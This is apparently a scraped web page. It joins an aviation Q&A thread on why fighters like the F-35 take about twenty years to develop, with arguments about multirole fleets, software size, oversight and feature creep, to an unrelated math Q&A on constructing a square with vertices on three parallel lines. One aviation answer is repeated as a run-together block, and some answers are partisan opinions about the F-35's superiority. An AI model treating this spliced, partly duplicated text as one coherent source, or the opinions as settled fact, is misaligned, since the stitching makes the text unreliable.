In fact, most modern and [surviving] legacy fighters are multirole: F-15, F-16, F-18, F-22, F-35, Su-27 family, Gripen NG, Rafale, Typhoon, J-10, J-20, etc.

Multiroles are flexible and increase total available capability. Example:

• Say Plane A (air superiority) does "100" air superiority and 0 ground attack.
• Say Plane G (ground attack) does 0 air superiority and 100 ground attack.
• Say Plane M (multirole) does 75 air superiority and 75 ground attack.
• Say you buy 100 planes. You have two options:

                          | Option 1    | Option 2
                          | single-role | multirole
--------------------------|-------------|-----------
number of Plane A (100/0) | 50          | 0
number of Plane G (0/100) | 50          | 0
number of Plane M (75/75) | 0           | 100
air sup. capability       | 5000        | 7500
ground capability         | 5000        | 7500

The multirole Plane M may not be as good as A or G in any specific role, but you get more capability overall. But if you build multiroles, you potentially have 100 planes available for each role.

This works because missions change. On Day 1 you might need a lot of air superiority, and on Day 2 you might need a lot of ground-attack. Well, with only single-role fighters (Option 1), half your fleet is useless on both days. But with multiroles (Option 2), all of them are useful on both days. (Missions can even change on the same sortie, eg an interdiction group defends itself against opposing fighters before proceeding to their target. F-16 strike fighters that can defend themselves can be more efficient than always assigning "just in case" F-15 escorts.)

This is even more true if you have more roles. If you have 10 different roles, you can only build 10 planes (average) for each role (in the single-role option). So up to 90% of your fleet might be useless on a particular day. (This is obviously an extreme example.) But even at the least-optimal point (max A, and max G), the multiroles still provide good capability (7500) compared to the single-roles (10,000). The single-roles' capability will vary between 5,000 and 10,000 (depending on the day), whereas the multiroles can always bring 7,500.

There's an exception. If you know beforehand you always need "5000" worth of air superiority, then yes, it's more efficient to build 50 air superiority fighters. But A) it's hard to know that beforehand (predicting the future), and B) that number will change over time regardless. But if you know you'll always need at least "1000" air superiority, then it's more efficient to buy 10 air superiority fighters (actually more than 10, depending on expected use). In practice, you'd build at least 10 air superiority fighters and give them some multirole functionality. (There's another exception. This model assumes all Air Superiority or Air to Ground capability is identical, regardless of source/type. Obviously this isn't always true.)

Notice the break-even point in the example above. Plane M was 75/75, but if it was less capable (50/50), then Option 1 and 2 both offer the same available capabilities. So the multirole plane must be competent in its typical roles, otherwise the fleet composition is inefficient. On the other hand, the multirole plane doesn't have to excel at its typical roles, it just needs to be competent.

Thankfully, multirole fighters can perform a variety of roles very well just by swapping payloads. Take the F-16 for example. Need defensive counter air? Load up the AMRAAMs. Need CAS? Grab nav/targeting pods and load some JDAMs/LGBs. Recce? Photo-recon pod. SEAD? HARMs, decoys, and jammers. Anti-armor? Mavericks and SDBs.
Antiship? Harpoons. Don't forget the fuel.

Recall how missions can change mid-flight. Those self-escorting F-16s are performing both roles simultaneously, say 25/75, so their total capability being used is 100, and fleet capability is 10,000 (equal to the single-roles on their best day, or 2x the single-roles on their worst day).

The F-35 can perform multiple roles simultaneously. They can escort themselves, find targets themselves, strike a ground target, jam enemy aircraft and ground radars, and even take out enemy SAMs, all the while acting like mini-AWACS/JSTARS for friendlies. Say that's 75/75/75/75/75/75, or 450 total per aircraft and 45,000 for the fleet. That's part of the value of multirole stealth fighters. They need far less support.

(Image source: Beyond the "Bomber": The New Long-Range Sensor-Shooter Aircraft and United States National Security - Lieutenant General David A. Deptula, USAF (Ret.), 2015.)

That's partly why you see the F-35 winning 20 vs. 8 fights and racking up >20:1 kill ratios at Red Flag.

## #5: [Multirole example] The F-35

[This section really deserves its own question/answer, but I'll abbreviate it here.]

Cost

The F-35A (\$94.6 million (FY16\$)) costs less than the Typhoon, Rafale, Gripen NG, and Super Hornet. In 2019, it'll cost a touch more (\$80 million) than a Block 50 F-16 (\$65-\$80 million).
Capability
Compared to the F-16, Hornet, Super Hornet, Harrier, A-10, Rafale, Gripen, and F-117, the F-35 is more capable in almost every relevant aspect. It has the best radar, best EW suite (probably), and best IR sensor suite. It has the best range and carries the most payload. It has the "superb low speed handling characteristics and post-stall manoeuvrability" of the Hornet and the acceleration of an F-16 (a 'Hornet with four engines,' remarked one pilot). At equivalent combat loadings, the F-35 is faster and accelerates/climbs more quickly. Sensor fusion and network integration provide excellent situational awareness (perhaps second to only AWACS) and greatly facilitate coordinated strikes.
Even versus the Raptor in air-to-air, it's not clear the F-22 would dominate. Some F-35 systems (the APG-81 radar, ASQ-239 EW suite, AAQ-37 DAS sensors) are direct upgrades of F-22 systems (APG-77, ALR-94, AAR-56). The F-35 radar ground mapping and targeting capability was actually backfitted onto the F-22. The F-35's EW suite has detected and jammed the F-22's radars. It's also twice as reliable and four times cheaper than its predecessor on the F-22. And the F-35's EODAS evolved the F-22's AAR-56 into much more than a missile launch detector, also providing ground-fire geolocation, weapon cueing, and situational awareness IRST (the famous "see through the cockpit floor"). Test pilots and USAF officials have also remarked that the F-35 is stealthier than the F-22.
The F-35 also has an integrated IR search and track system and helmet mounted cueing system. Both were canceled on the F-22. The F-35 will also carry 6 internal AMRAAMs (same as the Raptor) or 4 internal MBDA Meteors.
Development time
• F-16: 2 years for demo (1972-74), 4 years to first flight (1972-76), 8 years to service entry (1972-80)
• F-35: 5 years for demo (1996-2001), 10 years to first flight (1996-2006), 19 years to service entry (1996-2015)
Overall, F-35 development ostensibly took 2.5 times longer than F-16 development. Given the tremendous amount of new technology, it's notable that development time was comparable to other modern fighters, which also average 20 years (see far below) despite being far less technically challenging.
By running a joint program, the JSF eliminated a lot of potentially redundant system RDT&E and reinvested those savings into more advanced systems (and more systems). Eg, instead of designing three different radars, they designed a single (more advanced) radar---avoiding reinventing the same radar twice over, avoiding three separate test and validation programs, and avoiding managing three separate programs.
### #6: Minor points/additions
1.)
I still have great difficulty in accepting that...
A reason would be the complexity of the problem, which is very often quoted. All aerospace problems are extremely complex, that is nothing new. But now nobody can tackle them anymore? That was the basis of my question.
I think the complexity has simply grown faster than the tools' ability to keep pace.
I think with modern tools and processes, it would be very easy to out-design any plane from before 1980.
2.)
You only do these new programs every so often, there's so much of a backlog of stuff you want to get done---you throw too much at it. You want to do all the new technology, all the new manufacturing processes, new tools, new everything all at once. It makes the complexity exponential. [So] You need to find things to advance outside of these programs to get yourself ready for these programs, so when the opportunity comes up... the technologies [will already be] in the market, so you know what you're doing so you can execute... instead of "it's been so long that we need to start at ground zero [with] a new program plan, a new organizational structure, a new teaming"---all that at once makes it hard to execute. - David Kusnierkiewicz, Mission Systems Engineer (NASA), Johns Hopkins University Applied Physics Laboratory. Speaking at AIAA ("Whatever Happened to the Four Year Airplane", @31:00)
Many reasons:
1. Modern aircraft are vastly more complex
• Scale.
• An F-16 weighs as much as a B-25 (9 tonnes). An F-22 (20 tonnes) weighs 60% as much as a B-29 (34 tonnes).
• Software.
• The F-16C had 150,000 lines of code. The F-22 had 2 million lines of code. The F-35 has 8+ million. The F-35's logistics system has 24 million lines of code.
• Automation/software is basically narrow AI, replacing several extra crew members: radar terrain mapping, analyzing ground targets through multiple sensors (optical, IR, radar), automatic target recognition, missile approach and warning, electronic attack, defensive countermeasures, etc.
• Even engine start up is simple, "requiring just three switch selections, one each for the battery, integrated power pack and the engine... Initiated by a button in the cockpit, the [vehicle systems built in test (VS BIT)] self-tests almost every function imaginable on the aircraft... After 90 seconds, if there are no problems, the aircraft declares itself ready for flight" (Mark Ayton).
• In comparison, the SR-71 is practically just an airframe with a camera and jammer.
• Systems
• Systems are much more complicated than the basic structure:
• A "stealthy" low probability of intercept AESA radar, distributed aperture system for missile approach and warning and 4pi steradian observation, helmet mounted display, electro-optical targeting system for IR search and track and ground targeting, electronic warfare suite (which, in the F-35, is reputedly much more complex than even the radar), "stealthy" low probability of intercept and high data rate comms, electro-hydrostatic actuators (each actuator is self-contained rather than relying on an aircraft-wide hydraulics loop), and of course stealth (from the LPI comms, LPI radar, skin, to the nozzle).
• Sensor fusion. Then you must fuse all those sensors and comms together and integrate with the rest of the fleet so that everyone sees the same picture. If a lone drone spots a distant fighter/tank/missile, everyone immediately sees it as well. Sensor fusion is responsible for much of the system/software complexity. But you cannot divorce the systems from the aircraft. They are part and parcel of the 5th generation experience... and thus responsible for the incredible capabilities necessary for the future.
• In other words, much of the complexity is necessary to deliver the requisite capabilities.
2. More development and testing before service entry
• Modern safety standards
• Earlier aircraft entered service before many of their iconic systems were finished. In modern practice, the first few hundred F-16s would still be in development/testing, rather than pushed into service before even the airframe and control laws were completed.
• For example, in just its first few years of service, the F-16 had 50 crashes. It was nicknamed Lawn Dart for a reason. In contrast, the F-35 has had zero crashes and only two Class A mishaps, once when they flew too hard without first breaking in the engine and once when they tried starting the engine with excessive tail wind.
3. The physics are better understood
• The 50s, 60s, and 70s saw a flurry of new designs as new frontiers were explored. These were poorly understood, so as basic knowledge accrued, older designs rapidly became obsolete. And since airframes were relatively simple and manpower high, designs evolved incrementally but continuously (rather than in discontinuous leaps today). Opposite NATO, the Soviets were doing the same and thus engendered continuing competition.
Twenty years is pretty typical for modern aircraft development. The F-22, F-35, Typhoon, Rafale, Hornet (including 8-10 years of YF-17 development), and even PAK FA all took (or will take) about 20 years from start to IOC.
A quick note on the SR-71. It wasn't developed in two years. It was derived from the Lockheed A-12, which flew before that SR-71 mockup was even shown. The A-12 program began in the late 50s, and the J58 engines started development even before that, initially for the P6M strategic flying boat, which first flew in 1955.
A quick note on O2 issues. A lot of high performance jets have had recent hypoxia issues, not just the F-35, including the Hornets, Super Hornets, T-45s, and [infamously] the F-22s. The F-15, U-2, and SR-71 also had their fair share of O2 issues.
• On the software issue: does it have so many lines of code because it must be the multifunction fax-printer-scanner-toaster-wafflemaker from @Criggie's comment? – Koyovis Jun 12 '17 at 1:22
• So if the problem is: aircraft become more and more complex, why is the solution then not: split up the complexity in more airframes, which can each be optimised for their task? – Koyovis Jun 12 '17 at 2:31
• @Koyovis The main reason for "so many lines of code" is "because you can". Processors get faster, memory gets cheaper, so there is no incentive to economise - just stitch together an ever-increasing number of (supposedly) standard and (supposedly) reliable existing packages, and ignore the fact that you often end up with 57 varieties of the same basic functionality. Then, the safety and reliability guys get involved, and insist you write 10 lines of code which serve no more purpose than one, just to meet some box-ticking "quality standard" they invented... – alephzero Jun 12 '17 at 4:59
• A fine answer. Would you mind changing "a/c" to aircraft? I keep wanting to read it as air conditioning. – Nayuki Jun 12 '17 at 17:59
• That number of lines of code scares the hell out of anyone who has ever written code. 24 million lines of code approximately equals 48 million bugs. – Stephen Jun 15 '17 at 23:21
In the age of computerized design, drafting, testing and milling, we can develop products faster than ever before. It's definitely not technology slowing down development.
When we develop a plane for the future, whether it's for the Air Force or commercial aviation, we tend to focus on planning, and developing plans for the future. When Boeing and Airbus developed the 787 and the A380, they both had to forecast into the future the best way to spend their money to meet the demands of today and tomorrow. Each company took a gamble on whether airlines would prefer a hub and spoke model or direct flights. Similar planning happens with the US Air Force. That long-term planning does not always emphasize faster and cheaper.
In the case of the US Air Force they want planes that are fast, advanced and have no match in the sky. Others have mentioned some of the drawbacks and advantages of programs like the F-35; I am going to focus on what can be done today.

My example of the development speed possible is the Textron AirLand Scorpion. This is a composite fighter, designed with off-the-shelf parts, leaning heavily on technology developed for Cessna, who is the actual frame builder. It was designed to be a light attack and intelligence, surveillance and reconnaissance (ISR) platform. It was proposed in 2011, had its first flight in late 2013, and sells for $20 million. That's under two years of development.

This plane is no match for the F-35 in terms of speed or flexibility. The plane does not do VTOL or carrier landings, the maximum speed is 518 mph, the ceiling is 45,000' and the range is under 3,000 miles. The cost and time for development did not include things like the ejection seat and the flight controls, which are borrowed from other developments. If the Scorpion had incorporated all of those aspects in development, the price and development time would have increased dramatically. This plane is low cost and can handle training or defense. It shows what could happen in development in the 21st century when you remove a lot of politics, planning and other requirements from plane development and focus on building something low cost, low maintenance and reliable.

More information:

• An earlier example of a similar concept (cheap, proven technology, no fancy stuff) was the F5 Tiger. – Durandal Jun 15 '17 at 18:03
• Very good point. From the article in The Economist referenced in the question: "Mr Pugh also identified another intriguing trend: the race for bigger, better weapons is fiercest in peacetime but tends to fall once war actually breaks out. At that point, he argues, quantity takes precedence over quality." – Koyovis Jun 21 '17 at 2:20
• @Koyovis what mostly becomes important in wartime is rapid production of replacement assets to replace those lost in combat. That and ease of use so the system can be used by new recruits with only limited training. You still want to outperform your opponent, but numbers become more important than longevity of a single system as most of those systems won't last decades in wartime, they last days or weeks at best on average. – jwenting Jun 21 '17 at 7:21
My example of the development speed possible is the Textron AirLand Scorpion. This is a composite fighter, designed with off-the-shelf parts, leaning heavily on technology developed for Cessna, who is the actual frame builder. It was designed to be a light attack and intelligence, surveillance and reconnaissance (ISR) platform. It was proposed in 2011 and had its first flight in late 2013 and sells for $20 million for the plane. That's under two years of development. This plane is no match for the F-35 in terms of speed or flexibility. The plane does not do VTOL, carrier landings, the maximum speed it 518 mph, the ceiling is 45,000' and the range is under 3,000 miles. The cost and time for development did not include things like the ejection seat, the flight controls which are borrowed from other developments. If the Scorpion incorporated all of those aspects in development, the price and development time would have increased dramatically. This plane is low cost and can handle training or defense. It shows what could happen in development in the 21st century when you remove a lot of politics, planning and other requirements from plane development and focus on building something low cost, low maintenance and reliable. More information: • An earlier example of a similar concept (cheap, proven technology, no fancy stuff) was the F5 Tiger. – Durandal Jun 15 '17 at 18:03 • Very good point. From the article in The Economist referenced in the question: "Mr Pugh also identified another intriguing trend: the race for bigger, better weapons is fiercest in peacetime but tends to fall once war actually breaks out. At that point, he argues, quantity takes precedence over quality. " – Koyovis Jun 21 '17 at 2:20 • @Koyovis what mostly becomes important in wartime is rapid production of replacement assets to replace those lost in combat. That and ease of use so the system can be used by new recruits with only limited training. You still want to outperform your opponent, but numbers become more important than longevity of a single system as most of those systems won't last decades in wartime, they last days or weeks at best on average. – jwenting Jun 21 '17 at 7:21 This is just an additional point, but a bit more than a comment. In the late 60s there was still a cohort of design/test personnel whose skills and attitudes were formed during WWII and the early stages of the cold war. On the test side, the likes of Chuck Yeager and John Stapp were still active. Their careers were built on taking personal risks of a type that would be unthinkable today. The designers don't tend to be as famous but Alexander Kartveli led the design teams for the P-47 Thunderbolt, the F-84 Thunderjet and the F-105 Thunderchief, and not as a manager but as a designer, having been involved in plenty of earlier designs. How many people have experience of designing multiple aircraft these days? Of course the need to integrate ever-increasing amounts of first electronics, then software increases the complexity. This increases the workforce to a larger-than-optimal size, which further slows things down (especially as it involves subcontracting). • The same arguments apply to civil aviation and space. In all these cases sales consist of small numbers of expensive units, and the risks of failures leading to disaster are high. 
For smaller, more mundane and commonplace things like cars, it's easier to tweak or evolve existing designs, adding features based on the market; in these cases even multiple failures are unlikely to be catastrophic. – Chris H Jun 12 '17 at 15:15
• The complexity increases even more when politics decides to make the project multi-national. Now you have national egos (on the political side!) hijacking the project at their whim. The result is more duplication of work and endless meetings. Look at Augustine's Law XLVIII where that leads to. – Peter Kämpf Jun 12 '17 at 16:32
• After the TSR2 was cancelled, many British engineers left the company, many even emigrated. So for the next aircraft a lot of new engineers had to start from scratch. (The arrangement for cancelling TSR2 included shredding all drawings and destroying all models and prototypes. It was a political decision.) – RedSonja Jun 19 '17 at 8:30
• @RedSonja your brackets include a good point -- cold war paranoia led to a mindset that discarded hard-won knowledge – Chris H Jun 19 '17 at 8:35

One other factor that has to be considered: the government oversight of military projects has also risen in complexity. The paperwork and approvals necessary are staggering. A good deal of the trouble with the F-35 is changing requirements. Its mission requirements have changed a lot since the early 2000s when the prototype first flew. The 'see-through helmet' was not part of the original prototype. And, to a degree, the global situation changed during the F-35's gestation period. One reason Lockheed was able to develop the P-80, F-104, and U-2 so quickly was minimal government oversight on those projects, and a simpler situation to deal with. Another reason was Kelly Johnson.

• Specifically in the US, Congressional oversight can not be understated. Constantly changing funding availability, directed expenditures (buy X from Y), changing production rates, GAO Audits, investigations over minor performance issues all consume a huge amount of time. And Congress is incapable of dealing with the concept of continual improvement. If it isn't perfect, you can't get approval for full rate production, even if the 'shortcoming' can be fixed downstream with a simple field update. So the program continuously languishes in limited production where everything is more expensive. – Gerry Jun 15 '17 at 16:30
• The F35 program generates something like 10,000 pages of documentation per week. – Hephaestus Aetnaean Jun 17 '17 at 20:08
• And inevitably the red tape which leads to projects taking longer indirectly (through the increased timespan) leads to changing requirements which leads to even more red tape. Both lead to needless expense of a lot more money too, and the cost of a project spirals completely out of control to the point you can buy a single F-35 for the cost of almost a squadron of F-16s yet the aircraft is barely more capable (and that's an optimistic estimate). – jwenting Jun 21 '17 at 7:26

Don't forget the hours (years) of flow simulation, dynamic response, FEA, and other computer simulations that modern vehicles require. These are necessary and good, since they reduce testing cost and ultimately lead to more robust products at a fraction of the cost of real-world testing. They're not without their drawbacks (high initial computer cost, software and training, etc.) but on the whole it's much better than building a $40m prototype and watching it crash just because someone forgot to convert lbf to kg.
• True. I wonder why the process takes so long though, since the simulation and CFD can be done before the first machine is built. – Koyovis Jun 12 '17 at 22:22
• Yes, but it mostly works the other way. Prior to CFD and CAD analysis, actual wind tunnel tests (many thousands of hours) and static tests had to be done. CFD and CAD are supposed to be a cheaper and faster way of design. Yet the original question asks why doesn't it happen in practice, despite these advances. – Zeus Jun 15 '17 at 0:35
The first jet fighter only had to be better than a non-jet fighter.
The next jet fighter only had to be better than the first jet fighter for the single job it was created for.
Lots of different types of military jets were created that were a little bit better than what came before them, for the one task they were designed to do.

Then it was decided that it would be better to have fewer types of jets, and that they had to be able to do everything all the different jets they were replacing could. Then it was decided they had to be better than all the jets they were replacing, in every way.

As the older jets were still working, getting a “perfect”, “do everything”, “keep everyone happy” jet was considered more vital than keeping the design time or cost down... But then, as it took so long, and the next design might not come for another 20 years, the requirements were increased even more...
Technology-Life-Cycle
In the first decade of the 20th century planes were invented and started flying with piston engines; in the middle of the century we got advanced turbofan engines. Both required and allowed for a lot of new planes and designs and fast iterations with improvements, because they advanced everything. Basically we have seen "only" improvements since then, first bigger improvements and now smaller improvements. And improving an already well-working thing gets harder and harder over time.

If we get a new game-changer in flying technology, we will probably soon see a lot of new planes, then a second wave of improved new planes, and so on.

Besides that, the already-mentioned points are right. Especially: the Cold War is over, and therefore the need for huge fleets of new planes is small. Computers make everything comfortable but a lot more complicated. And customers want multi-role planes, which makes things even more complicated.
• Aerospace has always been complicated. What makes present day problems more complicated? – Koyovis Jun 13 '17 at 12:43
• First planes were not built for war, so engineers attached guns and it became more complicated, because you now hit your own propeller (either you sync the guns with it or build the guns into the wings, which weren't designed for guns...). And it goes on with radar, GPS, autopilot, fail-safe systems, retractable landing gear and finally the F-35: STOVL -> COMPLICATED^2 – Peter Jun 13 '17 at 14:54
Feature Creep
This has been ongoing for decades: Fewer types for more and more roles. Where military planes were originally designed for a narrow set of missions, there has been the tendency to replace multiple types with a single, multirole type.
What makes this so problematic for the designer is that different roles place wildly different requirements on the plane's abilities:
• The Navy demands a plane that can operate from their carriers
• The Army demands a plane for the strike/close air support role
• ... and a tank killer, too.
• The Air Force demands an interceptor/air superiority fighter
Now each of these roles has demands that more or less directly conflict with the demands of another role. You end up designing a jack-of-all-trades plane, trying to reconcile dash speed, long range, long loiter time, a reinforced airframe for carrier use (add folding wings for space), and a high-penetration anti-tank gun.
To cram all that into a single plane you need to make compromises that will not be ideal. To make up for the shortcomings of the compromise you need to go to the very edge of technology to at least cancel out some of the performance loss that came with the compromise (e.g. you need more engine power because your airframe isn't primarily designed for high speed, you need larger tanks than a pure fighter would need and so on). All this tends to add subsystem after subsystem, complexity and weight.
To counter the ever increasing weight (and airframe size) demanded by all the features, the only choice is to go for systems as compact and light as you can make them. Designing at the very edge of what technology allows is costly. Nobody has done it before in exactly that way; no industrial supply chain for the desired materials and tools exists. All this adds to development and procurement cost.

At the same time, your budget is limited for any given fiscal year; if you overrun the budget you'll need to get more budget, which will add bureaucratic delays and so on. All in all this adds up to steadily increasing cost in both time and money.
• Why then are there not multiple types, each optimised for their own task? – Koyovis Jun 14 '17 at 22:05
• @Koyovis Fewer types simplify military logistics and tactics. Need a fighter? Arm as fighter. Need a strike aircraft? Arm with a strike package. The tendency is to do more tasks with fewer units. Financing and bureaucracy also have some impact; it's easier to get one program approved than three. – Durandal Jun 15 '17 at 17:58
• This is the most important answer imho. This is what slows you down. The previous guy sitting in the customer's office wanted a cup holder in pink, now the new guy wants a bottle holder in blue. The new guy earns kudos by finding things the previous guy "got wrong" and coming up with an "improved" version. Sometimes it's just a new fad they saw some NATO partner got. Every one of these changes is waved through by our management - we earn money that way - and dumped on us. This is true of all military manufacture I have ever dealt with. – RedSonja Jun 19 '17 at 8:23
From the software development point of view, the F-35 has 8M lines of code on its own, 24M lines if you include all related systems. This code itself takes developers a long time to write, not to mention test.
• Is that one of the symptoms of lumping all requirements together? – Koyovis Jun 14 '17 at 22:09
• @Koyovis No, little of that software is branch/variant specific. Most runs the core systems like radar, EW, and IR sensors. – Hephaestus Aetnaean Jun 17 '17 at 20:44
• @HephaestusAetnaean which all had to be developed from scratch? – Koyovis Jun 19 '17 at 7:48
• @Koyovis - Better than developing from scratch three separate times. But no, it wasn't all from scratch. Many systems were evolved from prior work and significantly upgraded: radar, EW, EODAS, RAM, and engine (F-22); EOTS (Sniper XR); helmet-mounted display (DASH III/JHMCS); laser IR jammer (NG, various); countermeasures (various); carrier landing system (MAGIC CARPET)... Even if the Navy and Air Force developed their own separate planes, they each would've developed almost all those systems anyway... – Hephaestus Aetnaean Jun 19 '17 at 8:55
• @Koyovis - ...and so would competing nations. They're developing their own IRST, advanced radar/EW/ECM, HMD, stealth materials, etc etc. The F-35 needs to be that advanced in order to stay ahead of the curve and stay there 20-30 years later. A lot of the F-35's core, defining capabilities (stealth+sensor fusion+networking) define 5th gen. You cannot/should not separate them from the aircraft... or any would-be replacement. Penny-wise, pound-foolish. – Hephaestus Aetnaean Jun 19 '17 at 9:06
If you want to get into the specifics, the Government Accountability Office has repeatedly produced reports on the state of the F-35 program and made corresponding recommendations to the DOD, most of which have not been followed. A decent place to start is last year's GAO-16-390 (pdf), “F-35 Joint Strike Fighter: Continued Oversight Needed as Program Plans to Begin Development of New Capabilities”, which starts with a background overview of the history of the program and includes links to previous reports.
Short version: the DOD demanded the F-35 incorporate a raft of new technologies, many of which were not fully understood, and which it was wildly overoptimistic about, then rushed it into testing without adequate R&D and into production without adequate testing; when this was pointed out to them, the DOD spent 2001-2008 in denial and 2009-present reducing procurement and lowering production rates to cope with the resulting cost overruns.
• While requirements for "new technologies, many of which were not fully understood" could be the reason for the long development time of the F-35 it doesn't explain why other aircraft suffer, according to the OP, from the same problem. – mins Jun 15 '17 at 20:50
• The article mentions in the introduction that "...we're nearing end of development." In 2016, 20 years after the contract for development was issued. – Koyovis Jun 15 '17 at 23:02
• It's an interesting read. "As we have previously reported, DOD began the F-35 acquisition program in October 2001 without adequate knowledge about the aircraft’s critical technologies or design. " – Koyovis Jun 15 '17 at 23:38
• "Not fully understood." But that's true of basically any new technology you're developing for 20 years in the future. You can't innovate without risk. – Hephaestus Aetnaean Jun 17 '17 at 21:04
• @Koyovis - Some context: GAO's literal job is oversight/playing devil's advocate. They're never happy with any program---even the most successful ones. From dozens of reports, I think I've seen them give a compliment just once. Of course they say "more oversight is needed." When have they ever said less oversight is needed? It basically amounts to "I don't need a job." --- If you read their past reports on the F16, they say basically the same things. – Hephaestus Aetnaean Jun 17 '17 at 21:29
The answers above have provided very good insight into the issues associated with designing a new fighter jet. The question was particularly about the long development time, twenty years in total. Distilling all answers, a conclusion may be reached, but I'd first like to address some of the particular items raised.
To start with what I don't reckon the issue is, based on order-of-magnitude comparisons:
• Not stealth. The F-35 is compared with the F-16 with regard to observation by radar. This video mentions how stealth was incorporated into the SR-71 already - the SR-71 of the question! Stealth technology is over half a century old! A bit further on in the clip it is mentioned that the SR-71 has a radar signature 100 times smaller than that of an F-14, which is half the size.
• Not: the ever-improving arms of the adversary. Arms races and their consequences around the time of the American Civil War were already described by Jules Verne in his 1865 book From The Earth To The Moon. Again in the video referenced above, the weapons officers describe jamming the radar of weapons systems locking on to their plane. The arms race has been a growing issue for over 150 years. Yes, the issues are growing faster, but the solutions are standing on the shoulders of ever-growing giants.
• Not: the number of software Lines Of Code. Although a bug in aeronautical/weapons systems software has graver consequences than a bug in Microsoft Office, it is not the number of lines per se. The F-35 has 8 Million Lines Of Code (MLOC) on board, comparable to a Chevy Volt. F-35 logistics has 24 MLOC, comparable to Apache OpenOffice. That represents a sizeable amount of man-hours and development time - implemented incrementally, like the weapons systems are. (Reference: Aeronautical and weapons systems software.)
• Not: the problems being so complex. It's aerospace! The question boils down to: why could incredibly complex, novel problems be solved so much faster in the past? Yes, the mission of the SR-71 was flying fast with a camera while not being shot down by whatever advanced weapons were available. Apollo 11 only had one mission as well - what has that got to do with the price of fish? It was accomplished in eight years, less than half the time required to put the F-35 into service.
What then does contribute to the long development time? The question compares the present day situation with over half a century ago, when full scale warfare between nations was still a vivid memory, and nations were still armed to the teeth. The high tech nations have fortunately not been waging war with each other ever since.
This article, which appeared in a 2010 issue of The Economist, addresses the increasing cost of weapons systems. A quote:
Philip Pugh, author of “The Cost of Seapower”...also identified another intriguing trend: the race for bigger, better weapons is fiercest in peacetime but tends to fall once war actually breaks out. At that point, he argues, quantity takes precedence over quality.
So one can conclude that it is a general peacetime trend in all weapons systems that they should be perceived as superior. Not tested by war, their deterrent value may be as important as their actual destructive capability. And that is a good thing.

The F-35 turns out to defeat Augustine's Law XVI: In the year 2054, the entire defense budget will purchase just one aircraft. This aircraft will have to be shared by the Air Force and Navy 3-1/2 days each per week except for leap year, when it will be made available to the Marines for the extra day. I greatly enjoyed learning about Augustine's laws from @Peter Kämpf's answer - it looks, though, as if he was just signalling an age-old peacetime trend.

As stated in the end bit of the OP question, I don't want to knock the end product, the F-35, which ultimately turns out to be a competent weapon that defeats wider cost-increase trends. But why did it take so long, and why did it accumulate such bad press in the process?
Opinion ahead
It is clear that all factors that were driving urgency are not present anymore, which is a good thing. It is much easier to live in peaceful times. Also, the enemies became asymmetrical and different sorts of weapons were required. We don't have the fire-breathing program managers anymore, bred by wartime development of ever better weapons - like Kelly Johnson, whose record does not cease to amaze. He developed the Starfighter in one year, nine years after WWII with its Spitfires.
It may just be that fast jet development is in a dormant stage now and that everybody understands that. It's a good thing that the capability is kept afloat. The F-35 will turn out to be a good and cost effective machine, that just took a while longer to develop. What's two decades in a lifetime, right?
• Apollo was a success despite, not because of, NASA. When NASA got involved, you had cost overruns and deadly accidents. Only by leaving most of the work to contractors and directing them at arm's length could the program succeed. The prime reasons for success were a clear motivation of all involved (Beat the Russians!) and a clear goal (a man on the moon by the end of the decade). In today's projects, motivations are diverse (let's try to blame the other guy, mostly) and goals even more so. This is actually good, because it shows that threats have vanished. – Peter Kämpf Jun 24 '17 at 9:15
• The F-35 is compared with the F-16 with regard to observation by radar. The F-35 is actually much stealthier than the F-16 and apparently even stealthier than the F-22. If you'd like, I can dig up some pilot and program officials' testimonials. – Hephaestus Aetnaean Aug 9 '17 at 16:14
• the SR-71 has a radar signature 100 times smaller than that of an F-14, which is half the size. The comparison is a little unfair. • A) The SR-71 actively tried to lower its RCS. The F-14 didn't even bother. It's very easy to balloon your RCS if you're not careful, and back then people simply didn't care [most thought RF VLO was impossible, so why bother]. In LO terms, a 100x reduction is relatively easy to gain/lose. – Hephaestus Aetnaean Aug 9 '17 at 19:53
• B) A mach 3 recon platform is naturally stealthier [than a fleet defense fighter]: streamlining and thermal loads alone demand a very clean skin, unblemished by external stores, pylons, pods, large control surfaces, huge bubble canopies, etc… unlike the "dirty" F-14 whose entire raison d'etre was lugging around 1000 lb missiles. – Hephaestus Aetnaean Aug 9 '17 at 19:54
• @HephaestusAetnaean some fair points there, I'll amend the answer. – Koyovis Aug 9 '17 at 23:01
|
|
# “Given three parallel straight lines. Construct a square three of whose vertices belong to these lines.” Are all three lines required?
Given three parallel straight lines. Construct a square three of whose vertices belong to these lines.
What does "belongs" mean in the context of this question? Do the three lines have to be used to construct the square?
• As stated, the condition is ambiguous, so perhaps one can argue that there's a "trivial" solution with two vertices on one line and two vertices on another line. However, it is almost certainly the intention of the problem that each line contains (at least) one vertex. – Blue Feb 19 at 22:22
• Oh, and there's another trivial solution: two opposite vertices on one line, and one vertex on another line. :) – Blue Feb 19 at 22:34
• Probably the lines have to have the same distance between them. – NoChance Feb 19 at 22:43
• @NoChance: Same distances aren't necessary. – Blue Feb 19 at 22:45
• @Blue, it would be nice if you could provide a quick sketch...Thanks. – NoChance Feb 19 at 22:46
We are going to show two solutions, one geometric and the other algebraic :
Geometric solution :
Yes, the 3 lines are required. Consider the following figure :
Fig. 1.
Take any point $$O$$ on the line which is in-between the two others, called the extreme lines. Define $$A$$ and $$A'$$ as the perpendicular projections of $$O$$ on these extreme lines. Let $$d'=OA$$ and $$d=OA'$$. Let $$B$$ and $$B'$$ be the points on the two extreme lines such that $$AB=d$$ and $$A'B'=d'$$, taken in the same direction (see remarks below). Let us establish that:
$$B,O,B'$$ are solution points for this problem.
Proof: Triangles $$OAB$$ and $$OA'B'$$ are congruent right triangles; thus they possess complementary acute angles $$\alpha$$ and $$\beta$$ (see remarks below) with
$$\alpha+\beta=90° \tag{1}.$$
Consider flat angle $$A'OA$$. We can write, with the notations given in the figure :
$$\text{angle} \ A'OA \ = \ \alpha+\beta+\gamma \ = \ 180°$$
Using (1), we deduce that $$\gamma=90°$$. As the hypotenuses are equal, i.e., $$OB=OB'$$, the rectangle that can be built on $$OB$$ and $$OB'$$ is a square.
Remarks : 2 more rigorous definitions :
1) "taken in the same direction" means that $$\vec{AB}=k \vec{A'B'}$$ with $$k>0$$.
2) $$\alpha$$ could be formally defined as the acute angle such that $$\tan(\alpha)=d/d'$$.
Other remarks :
1) The above figure is reminiscent of the (now classical) proof of Pythagoras' theorem : see for example http://qed.sbytes.com/pythagoras.
